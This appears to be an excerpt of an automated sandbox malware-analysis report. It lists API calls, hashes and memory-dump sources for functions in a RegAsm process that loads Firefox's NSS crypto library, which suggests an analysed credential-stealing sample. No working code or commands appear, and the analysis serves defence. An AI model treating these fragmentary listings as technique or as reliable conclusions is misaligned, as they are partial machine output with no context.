                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                         • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                         • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                         • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                         • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                         • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                         • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 4291907967-0
                                                                                                        • Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                        • Instruction ID: 31b4abe2a102d073f190f96ccec9704252e8380768d938b851043950036ada58
                                                                                                        • Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                        • Instruction Fuzzy Hash: AD11A5A5E0820D5BE700AA666C41B6B75EC9F5998EF04403AFE09D7F41FB70D90886F1
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1C8C1B
                                                                                                        • EnterCriticalSection.KERNEL32 ref: 6C1C8C34
                                                                                                        • PL_ArenaAllocate.NSS3 ref: 6C1C8C65
                                                                                                        • PR_Unlock.NSS3 ref: 6C1C8C9C
                                                                                                        • PR_Unlock.NSS3 ref: 6C1C8CB6
                                                                                                          • Part of subcall function 6C25DD70: TlsGetValue.KERNEL32 ref: 6C25DD8C
                                                                                                          • Part of subcall function 6C25DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C25DDB4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                         • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                         • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                         • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                         • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                         • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                         • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                        • String ID: KRAM
                                                                                                        • API String ID: 4127063985-3815160215
                                                                                                        • Opcode ID: 69b2c510cc2a83dcb3e6a30de63acae72ca1596ccd2a1375fd9154abd813fbb9
                                                                                                        • Instruction ID: f77b9e361f2867e4ca7dc2749b7508262d578e38fc72a0e1b024d12af08511f3
                                                                                                        • Opcode Fuzzy Hash: 69b2c510cc2a83dcb3e6a30de63acae72ca1596ccd2a1375fd9154abd813fbb9
                                                                                                        • Instruction Fuzzy Hash: 272180B16056058FE700AF78C4C46A9FBF4FF15308F06896EE8888B701DB39D895CB96
                                                                                                        APIs
                                                                                                        • PR_EnterMonitor.NSS3 ref: 6C2C2CA0
                                                                                                        • PR_ExitMonitor.NSS3 ref: 6C2C2CBE
                                                                                                        • calloc.MOZGLUE(00000001,00000014), ref: 6C2C2CD1
                                                                                                        • strdup.MOZGLUE(?), ref: 6C2C2CE1
                                                                                                        • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C2C2D27
                                                                                                        Strings
                                                                                                        • Loaded library %s (static lib), xrefs: 6C2C2D22
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                        • String ID: Loaded library %s (static lib)
                                                                                                        • API String ID: 3511436785-2186981405
                                                                                                        • Opcode ID: e37a939c1fe3ea31492d7a237b8e64fe5f72c29f85ee91b76c78ac482163afae
                                                                                                        • Instruction ID: e460fd3c7c76fbe9490af2930b1405aa74119848e480987b674e1ddef75d9b8d
                                                                                                        • Opcode Fuzzy Hash: e37a939c1fe3ea31492d7a237b8e64fe5f72c29f85ee91b76c78ac482163afae
                                                                                                        • Instruction Fuzzy Hash: D611E6F57003089FEB509F14D849AA677B8AB56359F04822DEC0987F41DB32D918CBA2
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1B68FB
                                                                                                        • EnterCriticalSection.KERNEL32 ref: 6C1B6913
                                                                                                        • PORT_FreeArena_Util.NSS3 ref: 6C1B693E
                                                                                                        • PR_Unlock.NSS3 ref: 6C1B6946
                                                                                                        • DeleteCriticalSection.KERNEL32 ref: 6C1B6951
                                                                                                        • free.MOZGLUE ref: 6C1B695D
                                                                                                        • PR_Unlock.NSS3 ref: 6C1B6968
                                                                                                          • Part of subcall function 6C25DD70: TlsGetValue.KERNEL32 ref: 6C25DD8C
                                                                                                          • Part of subcall function 6C25DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C25DDB4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$UnlockValue$Arena_DeleteEnterFreeLeaveUtilfree
                                                                                                        • String ID:
                                                                                                        • API String ID: 1628394932-0
                                                                                                        • Opcode ID: b5b3721a430415f128336e8581e0e5ac5bec53786e2648e7f28ae52e2ebed356
                                                                                                        • Instruction ID: 319b208a1ba44e5a4e33dfa83a4c0475b442dee5ea3beb9d3cb9013c1999a6fd
                                                                                                        • Opcode Fuzzy Hash: b5b3721a430415f128336e8581e0e5ac5bec53786e2648e7f28ae52e2ebed356
                                                                                                        • Instruction Fuzzy Hash: 7D114CB56046098FDB00AF78D08856EBBF8FF16644F01456DEC99DB601EB30D898CBA2
                                                                                                        APIs
                                                                                                        • calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C1B87ED,00000800,6C1AEF74,00000000), ref: 6C211000
                                                                                                        • PR_NewLock.NSS3(?,00000800,6C1AEF74,00000000), ref: 6C211016
                                                                                                          • Part of subcall function 6C2798D0: calloc.MOZGLUE(00000001,00000084,6C1A0936,00000001,?,6C1A102C), ref: 6C2798E5
                                                                                                        • PL_InitArenaPool.NSS3(00000000,security,6C1B87ED,00000008,?,00000800,6C1AEF74,00000000), ref: 6C21102B
                                                                                                        • TlsGetValue.KERNEL32(00000000,?,?,6C1B87ED,00000800,6C1AEF74,00000000), ref: 6C211044
                                                                                                        • free.MOZGLUE(00000000,?,00000800,6C1AEF74,00000000), ref: 6C211064
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: calloc$ArenaInitLockPoolValuefree
                                                                                                        • String ID: security
                                                                                                        • API String ID: 3379159031-3315324353
                                                                                                        • Opcode ID: d5834cc715b29bbd50885923fe23235b0dce94f99843cd541ff156ad2eb7be18
                                                                                                        • Instruction ID: 60807dbccb6e87a9a814e1a4c8d151e837ebaa5406587dd850d89b58d042645a
                                                                                                        • Opcode Fuzzy Hash: d5834cc715b29bbd50885923fe23235b0dce94f99843cd541ff156ad2eb7be18
                                                                                                        • Instruction Fuzzy Hash: 6A014831E182585FE7202F2C9C05B5676E8BF26749F00012AEE0896E51EF71C195DBE2
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Name::operator+$NameName::
                                                                                                        • String ID: throw(
                                                                                                        • API String ID: 168861036-3159766648
                                                                                                        • Opcode ID: acf3c3f6b62bbe0bf60cea1499b19d7b2d2c206c409909a41351c69a4c2d4579
                                                                                                        • Instruction ID: f88cabbda18bcd4624fad7201f608a4b7bec8680ec46b3ab11068729d5ffd4ff
                                                                                                        • Opcode Fuzzy Hash: acf3c3f6b62bbe0bf60cea1499b19d7b2d2c206c409909a41351c69a4c2d4579
                                                                                                        • Instruction Fuzzy Hash: 87019B70600208BFCF14EF64D852EED77B5EF44748F10406AF905972A5DA78EA8B878C
                                                                                                        APIs
                                                                                                        • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C253046
                                                                                                          • Part of subcall function 6C23EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C23EE85
                                                                                                        • PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C227FFB), ref: 6C25312A
                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C253154
                                                                                                        • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C252E8B
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                          • Part of subcall function 6C23F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C229BFF,?,00000000,00000000), ref: 6C23F134
                                                                                                        • memcpy.VCRUNTIME140(8B3C75C0,?,6C227FFA), ref: 6C252EA4
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C25317B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Error$memcpy$K11_Value
                                                                                                        • String ID:
                                                                                                        • API String ID: 2334702667-0
                                                                                                        • Opcode ID: 80824b8f887687b74d0046943b0a3a81b8fb426b4582ed07ac2c1880aec5d493
                                                                                                        • Instruction ID: 08346025a3f32c5bfbf72b8b54280cafc0753dfc74787f87bd70bde3920a685c
                                                                                                        • Opcode Fuzzy Hash: 80824b8f887687b74d0046943b0a3a81b8fb426b4582ed07ac2c1880aec5d493
                                                                                                        • Instruction Fuzzy Hash: F3A19CB5A002199FDB24CF54CC80BABB7B5EF49308F048199ED4967781E731AD59CFA1
                                                                                                        APIs
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C21ED6B
                                                                                                        • PORT_Alloc_Util.NSS3(00000000), ref: 6C21EDCE
                                                                                                          • Part of subcall function 6C210BE0: malloc.MOZGLUE(6C208D2D,?,00000000,?), ref: 6C210BF8
                                                                                                          • Part of subcall function 6C210BE0: TlsGetValue.KERNEL32(6C208D2D,?,00000000,?), ref: 6C210C15
                                                                                                        • free.MOZGLUE(00000000,?,?,?,?,6C21B04F), ref: 6C21EE46
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C21EECA
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C21EEEA
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C21EEFB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 3768380896-0
                                                                                                        • Opcode ID: 978ad80e97002024bfec25537a748e28487697b6e2441b0a03de781c13e443df
                                                                                                        • Instruction ID: e36ef952bac84844d7f1cfd42d8b7db0971bf8a0238b8eb2255ca2c2a6127af3
                                                                                                        • Opcode Fuzzy Hash: 978ad80e97002024bfec25537a748e28487697b6e2441b0a03de781c13e443df
                                                                                                        • Instruction Fuzzy Hash: B5815AB5A0420A9FEB14CF55DC88AAB77F5AF88308F144428EE159BF51DB30E914CBA1
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C21C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C21DAE2,?), ref: 6C21C6C2
                                                                                                        • PR_Now.NSS3 ref: 6C21CD35
                                                                                                          • Part of subcall function 6C279DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C2C0A27), ref: 6C279DC6
                                                                                                          • Part of subcall function 6C279DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C2C0A27), ref: 6C279DD1
                                                                                                          • Part of subcall function 6C279DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C279DED
                                                                                                          • Part of subcall function 6C206C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C1B1C6F,00000000,00000004,?,?), ref: 6C206C3F
                                                                                                        • PR_GetCurrentThread.NSS3 ref: 6C21CD54
                                                                                                          • Part of subcall function 6C279BF0: TlsGetValue.KERNEL32(?,?,?,6C2C0A75), ref: 6C279C07
                                                                                                          • Part of subcall function 6C207260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C1B1CCC,00000000,00000000,?,?), ref: 6C20729F
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C21CD9B
                                                                                                        • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C21CE0B
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C21CE2C
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C2110F3
                                                                                                          • Part of subcall function 6C2110C0: EnterCriticalSection.KERNEL32(?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21110C
                                                                                                          • Part of subcall function 6C2110C0: PL_ArenaAllocate.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211141
                                                                                                          • Part of subcall function 6C2110C0: PR_Unlock.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211182
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21119C
                                                                                                        • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C21CE40
                                                                                                          • Part of subcall function 6C2114C0: TlsGetValue.KERNEL32 ref: 6C2114E0
                                                                                                          • Part of subcall function 6C2114C0: EnterCriticalSection.KERNEL32 ref: 6C2114F5
                                                                                                          • Part of subcall function 6C2114C0: PR_Unlock.NSS3 ref: 6C21150D
                                                                                                          • Part of subcall function 6C21CEE0: PORT_ArenaMark_Util.NSS3(?,6C21CD93,?), ref: 6C21CEEE
                                                                                                          • Part of subcall function 6C21CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C21CD93,?), ref: 6C21CEFC
                                                                                                          • Part of subcall function 6C21CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C21CD93,?), ref: 6C21CF0B
                                                                                                          • Part of subcall function 6C21CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C21CD93,?), ref: 6C21CF1D
                                                                                                          • Part of subcall function 6C21CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C21CD93,?), ref: 6C21CF47
                                                                                                          • Part of subcall function 6C21CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C21CD93,?), ref: 6C21CF67
                                                                                                          • Part of subcall function 6C21CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C21CD93,?,?,?,?,?,?,?,?,?,?,?,6C21CD93,?), ref: 6C21CF78
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                        • String ID:
                                                                                                        • API String ID: 3748922049-0
                                                                                                        • Opcode ID: e19f6aab00ceaa32f64e9e3b752ae893e5c65ee7c9a66b570135dc3b18723e8c
                                                                                                        • Instruction ID: 6df6b054359b50ea5ae326c7fe3be7b583ef5360d0f05fb7bd489f70dc5be05b
                                                                                                        • Opcode Fuzzy Hash: e19f6aab00ceaa32f64e9e3b752ae893e5c65ee7c9a66b570135dc3b18723e8c
                                                                                                        • Instruction Fuzzy Hash: 2B51B3BAA0420D9BE710EF69DC40B9A77F4AF48748F250534EE5897F40EB31E945CB91
                                                                                                        APIs
                                                                                                        • PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C1EEF38
                                                                                                          • Part of subcall function 6C1D9520: PK11_IsLoggedIn.NSS3(00000000,?,6C20379E,?,00000001,?), ref: 6C1D9542
                                                                                                        • PK11_Authenticate.NSS3(?,00000001,?), ref: 6C1EEF53
                                                                                                          • Part of subcall function 6C1F4C20: TlsGetValue.KERNEL32 ref: 6C1F4C4C
                                                                                                          • Part of subcall function 6C1F4C20: EnterCriticalSection.KERNEL32(?), ref: 6C1F4C60
                                                                                                          • Part of subcall function 6C1F4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C1F4CA1
                                                                                                          • Part of subcall function 6C1F4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C1F4CBE
                                                                                                          • Part of subcall function 6C1F4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C1F4CD2
                                                                                                          • Part of subcall function 6C1F4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1F4D3A
                                                                                                        • PR_GetCurrentThread.NSS3 ref: 6C1EEF9E
                                                                                                          • Part of subcall function 6C279BF0: TlsGetValue.KERNEL32(?,?,?,6C2C0A75), ref: 6C279C07
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1EEFC3
                                                                                                        • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C1EF016
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1EF022
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2459274275-0
                                                                                                        • Opcode ID: f81f7fadf1cea2f6c1a872380e030d306f9f48cf2013a2f9f9fa001f6d58d190
                                                                                                        • Instruction ID: 10823bc004edb419ce54dc7538fd74aed0d0531fb69d3dbd2fc68c6bf30de204
                                                                                                        • Opcode Fuzzy Hash: f81f7fadf1cea2f6c1a872380e030d306f9f48cf2013a2f9f9fa001f6d58d190
                                                                                                        • Instruction Fuzzy Hash: FB416271E00209ABDF019FA9EC85BEF7BBAEF48358F044029F914E6351E771D9158BA1
                                                                                                        APIs
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1C4894
                                                                                                          • Part of subcall function 6C20B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C2E18D0,?), ref: 6C20B095
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1C48CA
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1C48DD
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?), ref: 6C1C48FF
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C1C4912
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1C494A
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$AlgorithmTag_$DecodeErrorItem_Quick$Value
                                                                                                        • String ID:
                                                                                                        • API String ID: 759476665-0
                                                                                                        • Opcode ID: a867981633c240582411eb6c1255f23ada2d40ebf2acf5d0bb45896b5f40e5db
                                                                                                        • Instruction ID: a1b1683fa281e45232fa280413341db618dbc7d65c719839dd9a193f584c9f99
                                                                                                        • Opcode Fuzzy Hash: a867981633c240582411eb6c1255f23ada2d40ebf2acf5d0bb45896b5f40e5db
                                                                                                        • Instruction Fuzzy Hash: BA41CF70B08309ABE710CA69C881BAB73E89BA8708F00052DFE5597B41FB74E904CB53
                                                                                                        APIs
                                                                                                        • PORT_Alloc_Util.NSS3(00000060), ref: 6C1DCF80
                                                                                                        • SECITEM_DupItem_Util.NSS3(?), ref: 6C1DD002
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C1DD016
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1DD025
                                                                                                        • PR_NewLock.NSS3 ref: 6C1DD043
                                                                                                        • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C1DD074
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
                                                                                                        • String ID:
                                                                                                        • API String ID: 3361105336-0
                                                                                                        • Opcode ID: 310c7b25a9e2fd916d3f6c436316085698340b33a6cc01c2b885d2156097d0d4
                                                                                                        • Instruction ID: e483e1ae006df7b06de663fafd02efa15a02550c1b76446b5d33b488b77dcfab
                                                                                                        • Opcode Fuzzy Hash: 310c7b25a9e2fd916d3f6c436316085698340b33a6cc01c2b885d2156097d0d4
                                                                                                        • Instruction Fuzzy Hash: F341B4B0A013159FDB10EF29C8847977BE4EF58318F12416ADC198BB46D774E889CFA2
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
